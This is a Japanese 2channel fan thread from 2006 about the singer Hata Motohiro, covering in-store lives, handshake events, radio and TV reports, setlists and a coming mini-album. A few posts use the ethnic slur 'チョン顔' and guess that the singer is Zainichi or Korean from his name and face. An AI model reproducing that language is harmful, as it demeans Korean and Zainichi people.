これから売れ出したら握手会なんてなくなるだろうから
行ってしっかり握手するべし!

135 :NO MUSIC NO NAME:2006/11/19(日) 00:05:51 ID:ZLk7NHsp
>>134
実物を見た、身長や体格はどんな感じ?

136 :NO MUSIC NO NAME:2006/11/19(日) 00:56:16 ID:7WFJUkVf
>>135
身長は170前後くらいかな?もう少し高いかも。
体格は肩が割りとがっちりしてたけど思ったより顔が小さくて
そのせいでかぱっと見ではんなに大きく見えなかった。
服装も私服なのかあっさりシンプルで飾らない感じ。
物怖じしない落ち着いた受け答え、場の雰囲気とかも読めていて
出すぎず引きすぎず頭良いんだろうなとオモタ。
握手の時も一人一人にこやかにすごく丁寧に受け答えしていたよ。

137 :NO MUSIC NO NAME:2006/11/19(日) 01:24:20 ID:ar38PbFx
皆さんレポありがとう!
楽しみだな〜握手なんて手汗かきそうだw
握手しながら何か声かけましたか?

138 :NO MUSIC NO NAME:2006/11/19(日) 01:46:07 ID:yEP/fMGv
19時に仕事終わってから行けば良かった…マジで後悔。
サインも貰えたんだっけ?

139 :NO MUSIC NO NAME:2006/11/19(日) 01:55:35 ID:BdS7dtMM
ギター持っていったらサインしてもらえるかなぁ
やっぱ迷惑かな

140 :NO MUSIC NO NAME:2006/11/19(日) 02:22:18 ID:ar38PbFx
サイン入りのプレート?が貰えるって書いてあったような…
行った人どうでした?出来ればCDにサインして欲しいけど無理だよね。

141 :NO MUSIC NO NAME:2006/11/19(日) 10:53:44 ID:uF++6Fwz
>>136
詳しくトンです。楽しみだ!
今日は名古屋だっけ?行く人、レポ頼みます。


142 :NO MUSIC NO NAME:2006/11/19(日) 21:24:36 ID:4zTpZ1Sf
あれ?名古屋組はいないのかな・・・?


143 :NO MUSIC NO NAME:2006/11/19(日) 22:07:32 ID:EqHZPo+H


144 :NO MUSIC NO NAME:2006/11/20(月) 00:10:25 ID:GX4jGdJ+
200人!?
そんなに有名になっちゃったの?
こないだの渋谷の公開ラジオは20名位だったのに。

145 :NO MUSIC NO NAME:2006/11/20(月) 08:27:03 ID:vIbDxOuE
>>134
握手会まで含めた時間ってどのくらいかかりました?

146 :NO MUSIC NO NAME:2006/11/20(月) 11:03:28 ID:iAxvegh3
スペースシャワーで1日何回も色んなところに入り込んでるけどなに?
うざいんですけど。

147 :NO MUSIC NO NAME:2006/11/20(月) 22:57:10 ID:+k+EzfSm


148 :NO MUSIC NO NAME:2006/11/21(火) 00:26:41 ID:8zaWvXI6
チョン顔

149 :NO MUSIC NO NAME:2006/11/21(火) 15:17:04 ID:A2v866h/
ジャッキー・チョン

150 :NO MUSIC NO NAME:2006/11/22(水) 14:19:08 ID:Rc6RZVYg
いよいよ明日インストアだ!楽しみだな〜
BBS見てると握手の時、結構話せるみたいなんだけど
どの位の会話が可能なの?あとサイン入りプレートってどの位の大きさ?
小さいカバンだと入らないかな?袋なんてくれないよね?

151 :NO MUSIC NO NAME:2006/11/22(水) 14:59:10 ID:maM1bCkM
名古屋行ってきましたが、1人長くて1・2分ぐらい?
サインプレートはCDの歌詞カードくらいだよ。ちょっと厚い紙製です。

152 :NO MUSIC NO NAME:2006/11/22(水) 18:44:51 ID:C9b8RMwb
新宿組ですが、当日CD買ってもライブと握手できるよね?
かなり年上だから恥ずかしいかも・・
ここの皆さんは何才ぐらい?
自分31です。

153 :NO MUSIC NO NAME:2006/11/22(水) 19:17:48 ID:Ekuhj+1h
26です

154 :NO MUSIC NO NAME:2006/11/22(水) 20:55:06 ID:Rc6RZVYg
>>151
ありがとう!
結局、緊張して話出来なさそうだけどね…

>>152
自分も31だよ〜しかも一人で行くからちょっとビビってるよ。
握手会なんて初めてだし…でももうこんな機会は無いと思うからね〜
早目に行けばリハ聞けるんだよね?

155 :NO MUSIC NO NAME:2006/11/22(水) 21:16:39 ID:fX6LV6bl
男でも握手会行っておk?
まぁ結局行くけどw

156 :NO MUSIC NO NAME:2006/11/22(水) 21:37:54 ID:maM1bCkM
>>152
私26
けど、いろんな層の方いたよ



>>154
30分前位に行けば聴けたとオモ。
記憶が確かじゃないんでスマソ。

157 :NO MUSIC NO NAME:2006/11/22(水) 21:53:39 ID:LxfMM+bD
持参した私物にサインとかしてもらえるのかなぁ

158 :NO MUSIC NO NAME:2006/11/22(水) 21:56:10 ID:jkdEngh+
>>155
大阪では結構いたよ。
来てた人の年令わりと上な感じだったし。
一人できてたオサーンもいて話もしてたよw
秦くんのライブは男の人が見ても結構かっこいいと思う。
ああ、またライブで聞きたいが関西予定ないなぁ〜。
明日行かれる方レポおねがいします!

159 :158:2006/11/22(水) 22:41:25 ID:fX6LV6bl
レスどうもありがとう!
そっかぁ、楽しみだ。明日行ってきます〜。

160 :NO MUSIC NO NAME:2006/11/23(木) 01:03:07 ID:GTDfBRg1
明日13時ころ新宿行けば余裕だな
革ジャン着てるやつがいたら俺だと思ってくれw

161 :NO MUSIC NO NAME:2006/11/23(木) 01:07:56 ID:kO6DqZet
この人いいなぁ
声が凄くいいよ
CD明日買いにいきます

162 :NO MUSIC NO NAME:2006/11/23(木) 12:29:35 ID:9eJdiKO/
今から新宿向かうよ〜1時間位かかるから…
楽しみだな〜たくさん人居るのかな?

163 :NO MUSIC NO NAME:2006/11/23(木) 14:51:19 ID:9eJdiKO/
握手終わった…
緊張して目が見れなかったよ…
手が柔らかかった

164 :NO MUSIC NO NAME:2006/11/23(木) 14:56:51 ID:Rt7rpNhi
乙でした!
人多かった?
ライブよかったでそ?
あー行きたかった〜。

165 :NO MUSIC NO NAME:2006/11/23(木) 16:19:12 ID:GTDfBRg1
人めっちゃ多かった 20分くらい前に行ったらすでに100人以上いた
あと、結構デカイ 175cmは確実にある ブーツ履いてなければ。

166 :NO MUSIC NO NAME:2006/11/23(木) 17:52:19 ID:NIEupKA1
新宿で初めて生声聴いてきた。よかったよ〜。
リハーサルも本番だと思えばお得感があって大満足。
自分は1時間15分前に行って5列目ぐらいだった。
握手会も長蛇の列で30分くらい並んでやっと順番。
まだまだいっぱい並んでたけど何時までやってたのかな。


167 :NO MUSIC NO NAME:2006/11/23(木) 17:58:11 ID:T3ue/P//
今日すごい人だったよ。200人はいた。
リハで3曲半?と本番4曲。かなり良かった。
初めて生みたけど、ジャケ通りだった。
声はめちゃくちゃいい。
握手会は全員に同じやさしい笑顔を向けていた感じ。
2回とか握手してる人もいた。
知り合いもいたみたい。
自分、ちょー緊張しちゃった。
両手で握手してくれたよ。

168 :NO MUSIC NO NAME:2006/11/23(木) 19:04:43 ID:6v4x4Csp
握手会10番目くらいだったんだけど、四人くらい前のヲタっぽいコが
ずーっと手を握ったまま喋り続けてて周りが「おいおい、早く終われよ」
みたいな空気になった。

そのコが去った直後にスタッフが「みなさん、長い間秦とおしゃべりしたい気持ちは
わかりますが、なにぶん大勢のお客様がいらっしゃってますので、
どうぞ手短にお願いのほう申し上げます
みたいなことをアナウンスしててワロタ。」

169 :NO MUSIC NO NAME:2006/11/23(木) 19:05:54 ID:KtbDjdmW
スペシャ見てるけど面白いなw

170 :NO MUSIC NO NAME:2006/11/23(木) 20:20:29 ID:qlSqwQVs
可愛い子はいましたか?

171 :NO MUSIC NO NAME:2006/11/23(木) 20:24:02 ID:dU3HNehP
7時までかかったの?

172 :NO MUSIC NO NAME:2006/11/23(木) 20:49:04 ID:9eJdiKO/
生歌凄い良かったよ〜
自分は30分位前に行ったけどかなり後ろだった…
姿はあまり見えなかったけど歌声ジックリ聞きました。
もっと聞きたくなったよ。アルバムはまだだろうね〜
皮ジャン見掛けたけど>>160?wベージュの斜め掛けバック。

可愛い子いたよ。ギャルっぽい子もいたし。ファンか通り掛かりかは分からないけど。

173 :NO MUSIC NO NAME:2006/11/23(木) 22:05:14 ID:OhshBRqn
クリスマスライブは完全招待制?

スペシャかなりよかったw再放送録画しよ。

174 :NO MUSIC NO NAME:2006/11/23(木) 22:16:17 ID:qlSqwQVs
3


175 :NO MUSIC NO NAME:2006/11/23(木) 22:27:23 ID:6v4x4Csp
>>172
あー、おれバッグもってねぇやw

176 :NO MUSIC NO NAME:2006/11/24(金) 00:19:14 ID:1B6UmMJo
そういえば新宿のインストアにテレビカメラ入ってるって言ってたけど
どこの局かわかる?朝やるんだろうか?

177 :NO MUSIC NO NAME:2006/11/24(金) 00:22:41 ID:tHaQ5Wje
>>165
175cmはないだろ。いいとこ170ちょいくらい。


178 :NO MUSIC NO NAME:2006/11/24(金) 00:35:04 ID:Dxc+PCtR
>>177
そっかなー174弱ある俺よりでかかったんだが

179 :NO MUSIC NO NAME:2006/11/24(金) 22:36:32 ID:wRsJ1fFj
>>177>>178
自分は、172cmとみた。

180 :NO MUSIC NO NAME:2006/11/25(土) 09:36:50 ID:VSIz1+OV
>>173
スペシャ見れないのでよかったらレポお願いします。

181 :NO MUSIC NO NAME:2006/11/25(土) 11:33:25 ID:f8KZqFUr
>>180さんのために誰かレポよろしくお願いします。

182 :NO MUSIC NO NAME:2006/11/25(土) 19:18:28 ID:a5loQBfa
レポしちゃいますね


スペシャでは、ポテトサラダが好物だという話から、実際に食べるシーンなんかありましたよ。
あと、野球好きでとにかく松井選手が好きで、この年のバッティングフォームはこう、とわかると言って実演したりと、かなり面白かったです!

「鋼とガラスでできた声」とは別のキャッチコピーを考えてみよう!なんてのもありました。
スタジオライブも1曲あり。
こうして書いてみると盛りだくさんですね。

183 :NO MUSIC NO NAME:2006/11/25(土) 20:03:52 ID:1aBzcF1Q
松井はかなり好きみたいだよねw
明日はいよいよ福岡インストアだね。
今日のラジオどうだったのかな?

184 :NO MUSIC NO NAME:2006/11/25(土) 21:27:27 ID:VSIz1+OV
>>182
ありがとうございます!
面白かったんですね〜沢山話してるのを見た事がないから想像出来ないw

185 :NO MUSIC NO NAME:2006/11/26(日) 01:57:16 ID:Thtz9iRm
今、J-WAVEの番組でライブやってたんですが、久々に鳥肌。
オーガスタ系はちょっと食傷気味でしたが、この人は応援したい。
歌唱力とメロディセンス、どちらもタダモノじゃない!

186 :NO MUSIC NO NAME:2006/11/26(日) 02:43:10 ID:xUPd6ZDZ
>>185
ライブでぜひ生声を聞いてみて。
もっといいから!

187 :NO MUSIC NO NAME:2006/11/26(日) 09:47:41 ID:gTxNQI9r
ちょっとハードスケジュールすぎ!!仕事し過ぎ!!本人は毎日ふらふらやろうね。

188 :NO MUSIC NO NAME:2006/11/26(日) 15:14:08 ID:LY6TiK/k
こないだのスペシャで募集してたシンクロペン、当たった!
「君の指が触れるまで僕もただ折り畳まれていた」って
パッケージに書いてあるww

189 :NO MUSIC NO NAME:2006/11/26(日) 17:18:20 ID:NGoC/hbv
>>185
GyaOで聴いたけど、そんなふうに思えなかった

190 :NO MUSIC NO NAME:2006/11/26(日) 18:22:49 ID:TdbTEzJp
>>187
今必死にやんないでどうする

191 :NO MUSIC NO NAME:2006/11/26(日) 19:59:55 ID:gTxNQI9r
190>そりゃそうだ。失礼しました。

192 :NO MUSIC NO NAME:2006/11/28(火) 00:36:27 ID:PtJDEr3U
今は九州にいるのかな〜

193 :NO MUSIC NO NAME:2006/11/28(火) 00:48:20 ID:LvGkQyux
福岡ラジオより。今日は朝6:30から夜8:30過ぎ迄ラジオ出てた。
昨日夜水炊き、今日昼ラーメンを食べ、夜はもつ鍋だそう。
ポテトサラダに醤油をかけて食べる。母がやっていて自然とそうなったとか。
酒は焼酎とビールが好き。あんまりワインは飲まないらしい。
あとナポリタンにハマってる?作るのにハマってる?そこらへんがよく覚えてない。


194 :NO MUSIC NO NAME:2006/11/28(火) 01:35:20 ID:PtJDEr3U
>>193
お〜トンです!嬉しい!
お酒強いのかな?
ポテトサラダとナポリタン食べたくなってきたよ。
こんな夜中にw

195 :NO MUSIC NO NAME:2006/11/28(火) 05:08:53 ID:LvGkQyux
福岡追加
漫画ワンピースが好きで今4回目を読み直してる。泣けるらしい。
父の実家が福岡というアピールをしてた。『福岡市内ですか?』の質問に秦氏
『どこなんでしょうね…高速バスに乗って行ったのでもっと遠いと思います』って……。
本当に知らんのか教えなくないのか謎。
あと、動物占いはトラ。

196 :NO MUSIC NO NAME:2006/11/29(水) 15:02:31 ID:Z1ImPFhD
来年・再来年の紅白決定だなこの人

197 :NO MUSIC NO NAME:2006/11/29(水) 23:10:29 ID:KPw7ZZWG
この人曲、FMのパワープレイになっててすごい気になって着うたダウンロードしたよ。けっこう注目されてるんですね
私も生で聞きたいな

198 :NO MUSIC NO NAME:2006/11/30(木) 00:32:25 ID:ZNOMIWs0
スペシャでシンクロ(live version) きたね
全然ジャンル違うけど、この人の声でブラッククロウズみたいな感じの曲聴いてみたいと思った
あまりに声いいからさ

199 :NO MUSIC NO NAME:2006/11/30(木) 01:39:40 ID:BseIxK59
>>196
禿しく胴衣。先輩達を追い抜かす気で頑張って欲しい。
スレないでほしい。

200 :NO MUSIC NO NAME:2006/11/30(木) 02:20:01 ID:ppmTqMVR
>>199
禿シク同意。
今のやわらかい雰囲気好きだ。
変わってないとか言いつつ結局売れてお金入ったら
皆高飛車になってくもんな。
本人達は変わってないつもりみたいだけどね。
芸能人になったらそうなるの仕方ないのかな。
歌をメインに活動していい歌歌い続けてほしいな。


201 :NO MUSIC NO NAME:2006/12/03(日) 11:40:27 ID:JpBzAkYl
今日は広島インストア!

202 :NO MUSIC NO NAME:2006/12/04(月) 10:42:05 ID:8qX5bQSh
いく

203 :NO MUSIC NO NAME:2006/12/05(火) 00:00:56 ID:LcfAvD4B
広島堂だった?

204 :NO MUSIC NO NAME:2006/12/05(火) 02:01:43 ID:9BsJri35
◆秦基博 快進撃続く!ラジオチャート4週連続1位!!
 先週、新人の日本人男性シンガーソングライターとしては、
異例の全国ラジオO.A.チャート3週連続1位を獲得した秦基博。
この異例の記録をキッカケにブレイクすることは間違いなし!
といった内容のニュースを掲載させて頂きましたが、、
あれからも彼のデビュー曲『シンクロ』の快進撃は続いており、
今週、4週連続1位を記録!全国で凄まじい支持を受けている模様です。

記録たてまくりだなー

205 :NO MUSIC NO NAME:2006/12/05(火) 02:29:40 ID:ncacyCwI
早くライブでやってた他の曲も
がっつり聞きたいな。
シングル2曲じゃもの足りない。

206 :NO MUSIC NO NAME:2006/12/05(火) 13:25:47 ID:KCTlm0mR
来年早々にはミニアルバムが出ますよ。

207 :NO MUSIC NO NAME:2006/12/05(火) 19:31:20 ID:9BsJri35
>>206
お、本当か!
レコーディングしていたのはこれだったんだな〜
すごく楽しみだ。

208 :NO MUSIC NO NAME:2006/12/05(火) 19:35:54 ID:ncacyCwI
やたー!
マジで早く聞きたい〜。
アサガクルマエニ最高に好きなんだ。
入るかな〜wktk!

209 :NO MUSIC NO NAME:2006/12/05(火) 20:54:42 ID:i+p4oEo5
インディーズ時代のアルバム見つけた!手が震えたw

210 :NO MUSIC NO NAME:2006/12/05(火) 22:39:27 ID:a8M1FBZa
>>209
フツーにCD屋で売ってたのか!?
裏山!!

211 :NO MUSIC NO NAME:2006/12/06(水) 01:45:06 ID:iGJZGhRc
>>210
そう!普通に売ってた。CD屋でインディーズの棚にあったよ
まだ探せばあるのかもね。
発売がいつか書いて無かったけど分かる人居ますか?
インディーズで何枚か出してるのかな?
自分が買ったやつはいきなりシンクロの原曲だったよ。

212 :NO MUSIC NO NAME:2006/12/06(水) 10:02:04 ID:S/3PgcQc
1まい

213 :NO MUSIC NO NAME:2006/12/06(水) 10:27:23 ID:al1I9n5J
>>211
そうなんだ!探してみようっと。dです!

214 :NO MUSIC NO NAME:2006/12/06(水) 12:44:52 ID:iGJZGhRc
>>212
1枚しか出してないのかな?ありがとう。

>>213
見つかるといいね!自分もあるなんて思ってなくて
他の人のCD探してて偶然見つけてビックリした!

215 :NO MUSIC NO NAME:2006/12/06(水) 16:36:57 ID:S/3PgcQc
>>214
1まいだよ


216 :NO MUSIC NO NAME:2006/12/07(木) 00:55:34 ID:YktFiOdL
>>215
ありがとう!ちなみにいつ頃発売したものか分かりますか?

217 :NO MUSIC NO NAME:2006/12/07(木) 13:32:13 ID:Q9YZbnvd
>>216
発売日2004/01/20

218 :NO MUSIC NO NAME:2006/12/07(木) 21:36:04 ID:Umnc0nNH
>>96
遅くなったが・・・一応。
秦君の身長は178cmと前のHPに書いてたよー
ちなみに体重は68kgとも。

まさやんよりも大きいんだね

219 :NO MUSIC NO NAME:2006/12/07(木) 21:56:54 ID:iINb9J2T
>>218
前のHPってまだありますか?

220 :NO MUSIC NO NAME:2006/12/07(木) 22:34:49 ID:YktFiOdL
>>217
詳しいんですね!ありがとうございます。

221 :NO MUSIC NO NAME:2006/12/08(金) 01:52:57 ID:CH51nx3f
いい声だ。問題は曲だな!

222 :NO MUSIC NO NAME:2006/12/08(金) 13:51:25 ID:+bv8cbPG
TAHITI80のSOUL DEEPがモトネタかな。

223 :NO MUSIC NO NAME:2006/12/08(金) 14:34:19 ID:dduqrwJj
なんかキタ━━━━(゚∀゚)━━━━!!

http://www.sys-d.com/up/img/file037.jpg

224 :NO MUSIC NO NAME:2006/12/08(金) 17:26:53 ID:J7f1mccC
>>219
今年の7月ごろまで見れたけど、今じゃ消されて見れないよ
y●hooの画像検索のところで秦基博を検索したら前のHP少し見れるが。

>>223
おー!どんなだったかレポお願いしたいです

225 :NO MUSIC NO NAME:2006/12/08(金) 20:30:43 ID:teKjF1p1
ぼんばか



226 :NO MUSIC NO NAME:2006/12/09(土) 13:30:38 ID:uGzeiZlK
いまから渋谷のライブに行ってきます
何曲くらいやんのかなー

227 :NO MUSIC NO NAME:2006/12/09(土) 17:00:40 ID:lNYQ9A7r
>>226
おっ!いいな〜レポお願いします!

228 :NO MUSIC NO NAME:2006/12/09(土) 23:12:10 ID:uGzeiZlK
行ってきました。 出番は二人目。
三曲やったな。 シンクロと「○○しました〜」ってサビのやつと月夜がどうとかいう歌。
それよりもMCが面白かった。 ギターはJ-50かな。

229 :NO MUSIC NO NAME:2006/12/09(土) 23:23:17 ID:GGeclfwb
お!
MC内容覚えてたらレポねがいたい。
日記とかかなりおもしろいからな〜
秦のトークネタ自分もかなり好きだw

230 :NO MUSIC NO NAME:2006/12/09(土) 23:35:42 ID:uGzeiZlK
曲を演奏したあとにMCの人が来て

「いや〜、本当に引き込まれました。 こんなに引き込むとは恐ろしい男だと思いました。」
とかそんなこと言って、それに対して

「ええ、ええ、日頃からホントにね、恐ろしい男だと言われてまして」

みたいに返して会場が爆笑、だったかな。 あと一個笑いの山があったんだけど補足よろ。

231 :NO MUSIC NO NAME:2006/12/10(日) 01:45:59 ID:PqAF65v4
セトリ

1.青い蝶
2.シンクロ
3.僕らをつなぐもの

1と3は表記がこれで良いか不明。
MCは良く覚えていないが、雨で髪が〜みたいのだっけ?


232 :NO MUSIC NO NAME:2006/12/10(日) 12:29:48 ID:jAv3YREO
あと、新年明けたら新曲出るようなこと言ってたよね?

233 :NO MUSIC NO NAME:2006/12/10(日) 12:52:07 ID:fdQ2mIeT
シングルかな?
ミニでいいからアルバムだしてくれないかな〜
インストとかでやってた曲全部聞きたいよ〜

234 :NO MUSIC NO NAME:2006/12/10(日) 13:44:52 ID:/WMBjFDX
レポどーも!
盛り上がったみたいでよかったねー
新曲か、楽しみだな

235 :NO MUSIC NO NAME:2006/12/10(日) 14:06:09 ID:PqAF65v4
それと新曲はいつは春くらいには出るのか?の質問に

「春か、夏か・・・秋か・・・・冬。四季がある日本でよかった」
みたいな事言ってた。


236 :NO MUSIC NO NAME:2006/12/10(日) 14:53:07 ID:fdQ2mIeT
>>235
バロス!
アバウトすぎw

237 :NO MUSIC NO NAME:2006/12/11(月) 18:53:32 ID:USg7Kcj0
FM福岡のイベントライブ当たったヤツいるか?

238 :NO MUSIC NO NAME:2006/12/12(火) 09:59:58 ID:y8D0en2v
もう抽選連絡きてんのかな

239 :NO MUSIC NO NAME:2006/12/12(火) 17:53:43 ID:6YXYoOyk
うー、アルバム出してほしい。

240 :NO MUSIC NO NAME:2006/12/12(火) 18:16:27 ID:+01pzt+x
アルバム出てほしいね〜
もっと聞きたいよ〜

241 :NO MUSIC NO NAME:2006/12/12(火) 20:28:49 ID:BOt5STRM
スペシャでプッシュされてる割にはスレ伸びないね
かなりツボの声質だわ
ライブの映像でもよく声出てる
もしMステとか出たらここも一気に人増えるね
みんな望まないんだろうけど

242 :NO MUSIC NO NAME:2006/12/12(火) 21:39:20 ID:mhJRH+vU
>>241
人気が出るその前にライブして欲しいな〜
年内のやつは都合つかなくて応募出来なかったから

243 :NO MUSIC NO NAME:2006/12/12(火) 23:12:22 ID:CR29aPiq
アルバム出してくんないかなぁ
この人の潤いと乾燥が同居してる声がかなりツボ
もっと色んなの聴きたい

244 :NO MUSIC NO NAME:2006/12/13(水) 14:32:31 ID:jZ8FSF1y
アゲ

245 :NO MUSIC NO NAME:2006/12/15(金) 01:59:14 ID:J3UKLLsY
スレ伸びないなー

age

246 :NO MUSIC NO NAME:2006/12/15(金) 06:23:40 ID:Yj9q1rsH
上で言ってる人もいるが歌良し、
曲がまだちょっと青臭い(作りが)ので
もっといっぱい作っていればきっともっとイイ曲できる、応援。

キタヨ↓
ttp://www.youtube.com/watch?v=s2rOYeyDIlc

247 :NO MUSIC NO NAME:2006/12/15(金) 22:22:00 ID:TuFPajAC
PV見ると結構あれなんだな。
ヒゲがいまいちハマってなくて学生みたい

248 :NO MUSIC NO NAME:2006/12/15(金) 22:49:17 ID:LZkgYIVR
子供っぽい顔してるかんな


249 :NO MUSIC NO NAME:2006/12/15(金) 23:01:06 ID:ZSl9YgOr
でもヒゲないともっとおぼこいよw
だから生やしてるのかとオモタ。
曲はまだ青臭いところもあるのかもしれないが
今持ってるまったりした雰囲気や素朴さは
亡くさないでほしいとも思う。
声がほんといいから新曲も楽しみだ〜来春っていつ頃だろう。

250 :NO MUSIC NO NAME:2006/12/15(金) 23:29:54 ID:xv7Wlgmm
新曲楽しみだね〜
生歌も聞きたいなー本当にいい声だよねー

251 :NO MUSIC NO NAME:2006/12/16(土) 02:15:08 ID:YaJiuMJ1
ほんと、インストア観る度に間違いなく好きだな、すごい人だなって思います

インディーズ盤が欲しくてCDショップを回ったりしてみてるんですが、やっぱりそう簡単にはないですね〜
以前みつけた、と書き込みされた方はどこで買われたんでしょうか…?もしよろしければ教えていただきたいです…

252 :NO MUSIC NO NAME:2006/12/16(土) 02:25:59 ID:cCbXpk7T
私も電話とかしまくって探してます。是非何処で買われたのか教えていただきたいです。
どうしても聴いてみたくて諦めきれないです。

253 :NO MUSIC NO NAME:2006/12/16(土) 11:46:59 ID:HdP8O0cP
福岡の当たった

254 :NO MUSIC NO NAME:2006/12/17(日) 14:12:55 ID:o4EcMWQJ
オメ!レポヨロ!
トークもおもしろいからトークショー裏山〜
昨日の高知ライブはどうだったのかな?
矢野マキとか結構いいメンバーだったから行きたかったが
高知は遠かった…
アルバム出すまでは単独ライブは無さそうだよね。
もっとライブで曲を聞きたい。

255 :NO MUSIC NO NAME:2006/12/17(日) 23:40:44 ID:YqlAHfky
>>251>>252
インディーズ版があったのは八王子の新星堂だよ。
でも自分が買ったのが最後の1枚だった…ごめんよ。
自分も本当に偶然見つけたんだよね。普段は八王子行かないし。
自分も色々チェックしてみますね〜情報あったらお知らせします。

256 :NO MUSIC NO NAME:2006/12/18(月) 17:18:01 ID:TiIxD1BY
>>255
ありがとうございました!
もう少しさがしてみますね。
早く新しいアルバム出して欲しいです。

257 :NO MUSIC NO NAME:2006/12/19(火) 02:51:30 ID:pUjmK642
Mステ出ないかな〜。

258 :251:2006/12/19(火) 11:55:35 ID:hwm292c7
〉255
わあ!ありがとうございます!
みつかるといいな〜

259 :NO MUSIC NO NAME:2006/12/19(火) 19:18:33 ID:QK7t7v8N
クリスマスライブあたった!

260 :NO MUSIC NO NAME:2006/12/20(水) 01:23:54 ID:nyjlZAB5
>>259
当選連絡って郵便ですか?
家には何も・・・


261 :NO MUSIC NO NAME:2006/12/20(水) 08:37:17 ID:VV6hRtZ0
>>260
自分も当たったけど、メールで連絡きたよ!

262 :NO MUSIC NO NAME:2006/12/20(水) 17:26:39 ID:yP6ZtUUk
ミニアルバムの発表来たねー!
3月か、楽しみだ。

263 :NO MUSIC NO NAME:2006/12/20(水) 18:06:28 ID:f5QERo8p
鱗が入ってねーーーーー

264 :NO MUSIC NO NAME:2006/12/21(木) 15:17:31 ID:IdAjectp
彼、在日系?苗字と顔立ちがそんな感じする
すっごく良い声ですね。鋼と硝子で出来た声ってのピッタリ。

265 :NO MUSIC NO NAME:2006/12/21(木) 17:24:04 ID:ANA2fYi5
秦良いよね、今日シングル買った記念に初パピコ。
高音になると多少声割れるけど、そこがすごい良い。

つか自分も最初秦を初めて見たとき、思わず。
在日?韓流?と思ったw


266 :NO MUSIC NO NAME:2006/12/21(木) 17:52:29 ID:CUjGnwwn
さっき秦が通った

267 :NO MUSIC NO NAME:2006/12/21(木) 18:30:06 ID:7zxlpUWY
明日、六本木いく人いますか!?

268 :NO MUSIC NO NAME:2006/12/21(木) 18:50:47 ID:6jl7SPW5
明日、行こうか迷ってる。野外なん?どんなとこやろ?

269 :NO MUSIC NO NAME:2006/12/21(木) 19:03:24 ID:43zXu7t8
調べたら展望レストラン?みたいなオサレなとこだったような…
1人じゃ微妙だし、どっちみち仕事で行けないよ…
行ける人、レポお願いします!

270 :NO MUSIC NO NAME:2006/12/21(木) 19:07:43 ID:7zxlpUWY
きれいなとこだよ。私は一人でいこうかと思ってます。友達は秦さん知らないし予定あるみたいだし。。

271 :NO MUSIC NO NAME:2006/12/21(木) 19:20:48 ID:6jl7SPW5
ダイニングバーみたいな感じかな?
ぎりぎりじゃ席ないかな?どーしよー

272 :NO MUSIC NO NAME:2006/12/21(木) 19:48:19 ID:7zxlpUWY
入場券払うだけでみれるんですかね?

273 :NO MUSIC NO NAME:2006/12/22(金) 02:16:28 ID:05qdkdhT
>>272
入場するのに1500円位かかるが。
それとイベントの整理券等は出ないので、遅く行くと人がいっぱいかも

274 :NO MUSIC NO NAME:2006/12/22(金) 11:44:08 ID:3W18c9T+
今度ミニアルバム出るんですよね。
楽しみです!!

275 :NO MUSIC NO NAME:2006/12/22(金) 15:05:14 ID:4tQOx0vF
>>273
ありがとうございます!


276 :NO MUSIC NO NAME:2006/12/22(金) 17:07:15 ID:4tQOx0vF
私行きますわ(☆´∪`)

277 :NO MUSIC NO NAME:2006/12/22(金) 18:34:49 ID:BwF9xWcX
レポヨロ〜

278 :NO MUSIC NO NAME:2006/12/22(金) 19:34:45 ID:4tQOx0vF
他にいく方いらっしゃいますか?

279 :NO MUSIC NO NAME:2006/12/22(金) 20:06:52 ID:4tQOx0vF
今待機中です
40人くらいいます

280 :NO MUSIC NO NAME:2006/12/22(金) 20:29:01 ID:0Vn2Vpk6
お〜結構人集まってきてるんだね、良かった
行く人レポ頼おねがい!

281 :NO MUSIC NO NAME:2006/12/22(金) 21:04:35 ID:cjQ8hXVv
終わりました〜

282 :NO MUSIC NO NAME:2006/12/22(金) 21:11:31 ID:BwF9xWcX
どうだった?何曲歌った?

283 :NO MUSIC NO NAME:2006/12/22(金) 21:26:21 ID:4tQOx0vF
3曲歌いました!
はじまるまえにおっかけ4人組の女がキャーキャーうるさかった。
「秦くん髪きったよね!?横がすっきりした」
とか
「二週間ぶりのライブだわ」
とか。きもちわりぃ
んでライブのほうですが
1 ドット
2 シンクロ
3 僕らをつなぐもの
司会の男性と楽しそうにしゃべってました。

284 :NO MUSIC NO NAME:2006/12/22(金) 21:32:54 ID:BwF9xWcX
トントン!
ドットは初披露かな?局長はどうだった?

285 :NO MUSIC NO NAME:2006/12/22(金) 21:53:07 ID:4tQOx0vF
私的意見ですが、曲調はぼくらをつなぐものに似ていた気がします。


286 :NO MUSIC NO NAME:2006/12/22(金) 22:11:39 ID:sHjWbVvD
昨日あった福岡のレポです。

1.青い蝶
2.青
3.ドット
4.季節が笑う
5.やわらかな午後に遅い朝食を
6.シンクロ
7.僕らをつなぐもの


「秦基博にしか出来ない音楽を秦基博らしく創っていきます」って言ってた。
トークの時、質問アンケート読まれた人はシンクロのペンを秦からプレゼントされてたよ。

287 :NO MUSIC NO NAME:2006/12/22(金) 22:11:54 ID:hP9ToPvC
>>283
もしかして、その4人組って新宿インストの時最前にいた子たち?

288 :NO MUSIC NO NAME:2006/12/22(金) 22:18:11 ID:4tQOx0vF
>>286 ありがとうございます!
季節が笑う ききたかった(´д`;)
>>287
新宿いけなかったんですよ。。
でもその4人のうちの一人が2ちゃんみてるらしい。話きこえた

289 :NO MUSIC NO NAME:2006/12/23(土) 01:33:13 ID:z0pDE+yZ
>>283
それって最前列で椅子にギュウギュウで座ってた奴ら?
その会話は聞いてないが、たしか4人組くらいだったんで。

>>288
2ちゃん見てんのか。
話って「ひどーい」とか?

290 :NO MUSIC NO NAME:2006/12/23(土) 02:27:10 ID:KeNl+g9x
レポありがと〜福岡のも!
青って曲は青い蝶と別なんだね・・

今日のdot歌ったんだ!僕らを〜系なのか、
大阪のインストアでは歌ってなかったから早く聴いてみたい

長澤君の大阪のインストアん時にも本人が退場したあとに
そういう3人組居たな、"長澤君って中学のときはさ〜"とか自慢げに(笑)
声も大きかったしかなり迷惑だった ちょっと考えて欲しいよね。






291 :NO MUSIC NO NAME:2006/12/23(土) 03:12:02 ID:1MBwLkk3
J-WAVEのイベント行ってきました!
システムがよくわからなかったし1人だしでどうしようかと思ったけど
やはり行ってよかったです!初生秦くんでした^^
でも3曲なんてあっという間・・・
クリスマスライブ、行きたかったなぁ・・・
当日券なんてないのでしょうか??

292 :NO MUSIC NO NAME:2006/12/23(土) 03:40:44 ID:z0pDE+yZ
>>291
完全招待制のライブだから
チケの発売はしないんじゃない?


293 :NO MUSIC NO NAME:2006/12/23(土) 08:52:38 ID:qcUhDiDI
>>289
いや、昨日
3列目(いすの後ろ)にいました。

>>291
私も一人でしたけどいってよかったです!
電車賃高かったけど

